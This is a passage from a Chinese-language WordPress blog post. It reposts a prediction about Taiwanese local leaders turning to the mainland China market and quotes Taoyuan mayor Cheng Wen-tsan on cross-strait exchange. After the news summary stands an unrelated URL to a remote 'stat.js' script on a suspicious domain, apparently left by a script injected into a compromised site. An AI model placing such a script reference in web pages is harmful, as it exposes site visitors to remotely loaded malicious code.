分類
筆記 經濟分析

經濟學預測檢驗

該怎麼說呢?經濟學真的是一門準確研究人類行為的科學。

重貼昨日預測:「縣市長短時間拼經濟的最低成本方法就是全面擁抱大陸市場,在中國『軟更軟、硬更硬』策略下,從經濟面達到分化台灣效果。綠色縣市想學都難…」

https://money.udn.com/money/story/6808/3504205

新聞摘要:

桃園市長鄭文燦今天上午走訪蘆竹區五福宮等宮廟參拜祈福謝票,針對面對民進黨大敗,媒體訪問總統蔡英文的兩岸關係是否應該修正?鄭文燦說,六都首長已經產生,北京必須要面對台灣多元民意,不是高雄市長換人,觀光客就到高雄,這樣做法不對,應該兩岸整體要朝更善意、更交流方向走,對岸所設置的政治前提,應該尋找比較好的自我解套,台灣是民主社會對於這些政治前提並不接受,交流就是交流,不應該有藍綠差別,也不應該附加任何政治條件。

https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s